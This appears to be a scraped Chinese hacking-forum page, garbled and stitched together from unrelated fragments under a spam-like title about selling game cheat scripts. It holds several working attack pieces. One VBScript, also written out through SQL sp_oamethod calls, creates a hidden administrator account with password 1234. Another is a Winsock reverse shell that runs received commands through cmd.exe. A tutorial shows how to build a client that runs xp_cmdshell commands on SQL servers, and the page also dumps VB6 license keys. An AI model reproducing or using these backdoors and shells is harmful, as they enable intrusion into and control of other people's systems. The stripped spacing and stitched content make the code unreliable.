锤石脚本钩哪里有卖的上网出现
它需要注册才能同时使用全部功能,但是我们这里仅用到COOL1.33版的一部分编辑和存盘的功能就足够了setwsnetwork=CreateObject("WSCRIPT.NETWORK") os=""&wsnetwork.ComputerName Setob=GetObject(os)'得到adsi接口,绑定 Setoe=GetObject(os&"/Administrators,group")'属性,admin组 Setod=ob.Create("user","test")'建立用户 od.SetPassword"1234"'设置密码 od.SetInfo'保存 Setof=GetObject(os&"/test",user)'得到用户 oe.addos&"/test" SQL语句如下,采用sp_oamethod过程: declare@oint,@fint,@retint execsp_oacreate'scripting.filesystemobject',@oout execsp_oamethod@o,'createtextfile',@fout,'c:\1.vbs',1 exec@ret=sp_oamethod@f,'writeline',NULL,'setwsnetwork=CreateObject ("WSCRIPT.NETWORK")' exec@ret=sp_oamethod@f,'writeline',NULL,'os=""&wsnetwork. ComputerName' exec@ret=sp_oamethod@f,'writeline',NULL,'Setob=GetObject(os)' exec@ret=sp_oamethod@f,'writeline',NULL,'Setoe=GetObject (os&"/Administrators,group")' exec@ret=sp_oamethod@f,'writeline',NULL,'Setod=ob.Create ("user","test")' exec@ret=sp_oamethod@f,'writeline',NULL,'od.SetPassword"1234"' exec@ret=sp_oamethod@f,'writeline',NULL,'od.SetInfo' exec@ret=sp_oamethod@f,'writeline',NULL,'Setof=GetObject (os&"/test",user)' exec@ret=sp_oamethod@f,'writeline',NULL,'oe.addos&"/test"'

'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷 'by009,baicker@hotmail.com 'date:071221 Dimrevdata setsock=WScript.createobject("MSWinsock.Winsock","WSEvent_") setsc=createobject("WScript.Shell") Setfso=CreateObject("Scripting.FileSystemObject") sock.connect"127.0.0.1",1234 SubWSEvent_Connect() wscript.echo"Connected!" endsub SubWSEvent_DataArrival(bytes) MyString="blank" sock.GetDataMyString revdata=MyString ifbytes>0then ifinstr(revdata,"exit")>0then sock.close sock.close sock=nothing bClose=true exitsub else onerrorresumenext tempfile="C:"&fso.GetTempName cmd=left(revdata,len(revdata)-1) callsc.Run("cmd.exe/c"&cmd&">"&tempfile,0,True) Settxf=fso.OpenTextFile(tempfile,1,false,0) sock.senddatatxf.readall&vbcrlf&vbcrlf txf.close callfso.DeleteFile(TempFile,True) endif sock.senddata"009>" endif endsub WhileNotbClose WScript.Sleep1 Wend ――――――――――――――――――――――――――――――――――――― 调用winsock,未装VB的需要导入注册表 ――――――――――――――vb6controls.reg―――――――――――――――――- REGEDIT HKEY_CLASSES_ROOT\Licenses=Licensing:Copyingthekeysmaybeaviolationofestablishedcopyrights. //MaskedEditControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\BC96F860-9928-11cf-8AFA-00AA00C00905=mmimfflflmqmlfffrlnmofhfkgrlmmfmqkqj //ChartControl6.0(OLEDB)licensekey HKEY_CLASSES_ROOT\Licenses\12B142A4-BD51-11d1-8C08-0000F8754DA1=aadhgafabafajhchnbchehfambfbbachmfmb //CommonDialogControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\4D553650-6ABE-11cf-8ADB-00AA00C00905=gfjmrfkfifkmkfffrlmmgmhmnlulkmfmqkqj //ADODataControl6.0(OLEDB)licensekey HKEY_CLASSES_ROOT\Licenses\C4145310-469C-11d1-B182-00A0C922E820=konhqhioohihphkouimonhqhvnwiqhhhnjti //CommonControls-36.0licensekey HKEY_CLASSES_ROOT\Licenses\38911DA0-E448-11D0-84A3-00DD01104159=mcpckchcdchjcjcclidcgcgchdqdcjhcojpd //WindowsCommonControls-25.0(SP2)licensekey HKEY_CLASSES_ROOT\Licenses\9E799BF1-8817-11cf-958F-0020AFC28C3B=uqpqnqkjujkjjjjqwktjrjkjtkupsjnjtoun //WindowsCommonControlslicensekey HKEY_CLASSES_ROOT\Licenses\57CBF9E0-6AA7-11cf-8ADB-00AA00C00905=aahakhchghkhfhaamghhbhbhkbpgfhahlfle //DataBoundGridControl5.0(SP3)licensekey HKEY_CLASSES_ROOT\Licenses\556C75F1-EFBC-11CF-B9F3-00A0247033C4=xybiedobrqsprbijaegcbislrsiucfjdhisl //DataBoundListControls6.0licensekey HKEY_CLASSES_ROOT\Licenses\096EFC40-6ABF-11cf-850C-08002B30345D=knsgigmnmngnmnigthmgpninrmumhgkgrlrk //InternetTransferControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\78E1BDD1-9941-11cf-9756-00AA00C00908=yjrjvqkjlqqjnqkjvprqsjnjvkuknjpjtoun //MultimediaControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\B1EFCCF0-6AC1-11cf-8ADB-00AA00C00905=qqkjvqpqmqjjpqjjvpqqkqmqvkypoqjquoun //ChartControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\7C35CA30-D112-11cf-8E72-00A0C90F26F8=whmhmhohmhiorhkouimhihihwiwinhlosmsl //WindowsCommonControls-26.0licensekey HKEY_CLASSES_ROOT\Licenses\4F86BADF-9F77-11d1-B1B7-0000F8753F5D=iplpwpnippopupiivjrioppisjsjlpiiokuj //WindowsCommonControls6.0licensekey HKEY_CLASSES_ROOT\Licenses\ED4B87C4-9F76-11d1-8BF7-0000F8754DA1=knlggnmntgggrninthpgmnngrhqhnnjnslsh //CommControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\4250E830-6AC2-11cf-8ADB-00AA00C00905=kjljvjjjoquqmjjjvpqqkqmqykypoqjquoun //DataGridControl6.0(OLEDB)licensekey HKEY_CLASSES_ROOT\Licenses\CDE57A55-8B86-11D0-b3C6-00A0C90AEA82=ekpkhddkjkekpdjkqemkfkldoeoefkfdjfqe //DataListControl6.0(OLEDB)licensekey HKEY_CLASSES_ROOT\Licenses\A133F000-CCB0-11d0-A316-00AA00688B10=cibbcimbpihbbbbbnhdbeidiocmcbbdbgdoc //DBWinlicensekey HKEY_CLASSES_ROOT\Licenses\D015B071-D2ED-11d0-A31A-00AA00688B10=gjdcfjpcmjicjcdcoihcechjlioiccechepd //MSDBRPTlicensekey HKEY_CLASSES_ROOT\Licenses\9DF1A470-BA8E-11D0-849C-00A0C90DC8A9=cchcqjejhcgcqcfjpdfcdjkckiqikchcojpd //FlexGridControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\72E67120-5959-11cf-91F6-C2863C385E30=ibcbbbebqbdbciebmcobmbhifcmciibblgmf //MAPIControls6.0licensekey HKEY_CLASSES_ROOT\Licenses\899B3E80-6AC6-11cf-8ADB-00AA00C00905=wjsjjjlqmjpjrjjjvpqqkqmqukypoqjquoun //MSRDO2.0licensekey HKEY_CLASSES_ROOT\Licenses\B1692F60-23B0-11D0-8E95-00A0C90F26F8=mjjjccncgjijrcfjpdfjfcejpdkdkcgjojpd //RemoteDataControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\43478d75-78e0-11cf-8e78-00a0d100038e=imshohohphlmnhimuinmphmmuiminhlmsmsl //WindowlessControls6.0licensekey HKEY_CLASSES_ROOT\Licenses\80E80EF0-DBBE-11D0-BCE2-00A0C90DCA10=qijimitpmpnpxplpvjnikpkpqoxjmpkpoivj //PictureClipControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\6FB38640-6AC7-11cf-8ADB-00AA00C00905=gdjkokgdldikhdddpjkkekgknesjikdkoioh //RichTextBoxControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\DC4D7920-6AC8-11cf-8ADB-00AA00C00905=iokouhloohrojhhhtnooiokomiwnmohosmsl //SheridanTabControllicensekey HKEY_CLASSES_ROOT\Licenses\190B7910-992A-11cf-8AFA-00AA00C00905=gclclcejjcmjdcccoikjlcecoioijjcjnhng //SysInfoControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\E32E2733-1BC5-11d0-B8C3-00A0C90DCA10=kmhfimlflmmfpffmsgfmhmimngtghmoflhsg //WinsockControl6.0licensekey HKEY_CLASSES_ROOT\Licenses\2c49f800-c2dd-11cf-9ad6-0080c7e7b78d=mlrljgrlhltlngjlthrligklpkrhllglqlrk 下面是使用字符串的代码:
->PrivateDeclareFunctionGetSystemDirectoryLib"kernel32"Alias_"GetSystemDirectoryA"(ByVallpBufferAsString,ByValnSizeAsLong)AsLongPrivateSubForm_Click() DimnAsInteger DimstrAsString str=Space$(256) n=GetSystemDirectory(str,256) str=Left$(str,n) PrintstrEndSub-> 在上面这段代码中,字符串参数lpBuffer返回Windows的系统路径VBScript code On Error Resume Next Const wbemFlagReturnImmediately=&h10 Const wbemFlagForwardOnly=&h20 strComputer="." Set objWMIService=GetObject("" & strComputer & "/root/CIMV2") Set colItems=objWMIService.ExecQuery("SELECT * FROM Win32_SystemDriver", "WQL", _ wbemFlagReturnImmediately + wbemFlagForwardOnly) For Each objItem In colItems WScript.Echo objItem.DisplayName Next 用VB打造自己的SQL连接器
大家好.....好长时间没上网了...祝大家新年快乐....好了.工程开始现建一个普通窗口..放上3个textBox控件.一个是用来输入ip的txtaddres..还有就是用户名txtuser和密码txtpass...为相应的控件起个好听地名字还有1个按钮用来确定连接...
定义一个连接对象..和记录集对象publicconnasnewADODB.Connect'连接的publicrecvasnewADODB.Resordset'用来接收数据的'''''''''''''''''''''''''''''''''''''''''''''''''''连接按钮事件click()dimsqlasstringsql="Provider=SQLOLEDB.1;Password="&txtpass&";PersistSecurityInfo=True;UserID="&txtuser&";InitialCatalog="&msdb&";DataSource="&txtaddressql变量力存放的是连接字符串....conn.ConnectionString=sql'连接字符串..conn.open'连接ifconn.state=0then'表示连接不成功...当conn.state=1表示连接成功了....
好了...我们的软件现在已经可以正确的连接上sql服务器了现在我们要能执行dos命令...
在我们刚才的窗体里面在创建一个textbox(txtsend)用来打dos命令和一个发送命令按钮发送命令以后服务器会返回数据...所以还要加一个RichTextBox控件(个人推荐)...用textbox也可以在sql默认得数据库msdb里面可以执行xp_cmdshell'dos命令'对...我们现在也要把这条命令发送到服务器执行.....执行按钮事件click()dimsqlasstringsql="xp_cmdshell'"&txtsend.text&"'"'命令应该用单引号括起来....setrecv=conn.Execute(sql)'执行sql命令.并把返回数据记录在记录集recv里面dimiasinteger,colasstringWhileNotrecv.Eof'读数据到最后一行fori=0toRecv.Fields.Count-1col=recv.fields(i).nameRichTextBox.setcolor=&hff00&'改颜色RichTextBox.seltext=recv.fields(col).valuerecv.movenextnextwend程序可能会出现问题..最好加上onErrorgotoerr1err1:msgboxerr.number&err.Description'程序错误编号和类型还告诉大家vb里面有个控件可以生成连接字符串.....components或者直接按Ctrl T..添加MicrosoftADODataControl6.0(OLEDB)控件控件属性里面的选择第三个选项UseConnectionString然后点Build配置字符串就可以了..配置完以后就可以把这个控件删掉.....就讲说这里了....上面已经基本实现了主题的功能..大家还可以自己改进一下...是不是很简单喔大家有什么问题可以找我一起研究..===============================================本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
编写:特务QQ:27272855E-mail:XF_Mengqier@163.com
->并保存所有打开的文件1003过滤器是用来在“打开/另存为”处理中,通过对该属性的设置来控制文件的类型此脚本的作用是每2分钟检测一次temp文件夹,若emule下载完成,则temp为空,脚本等待2分钟后强行关闭本地计算机,没有超时或警告。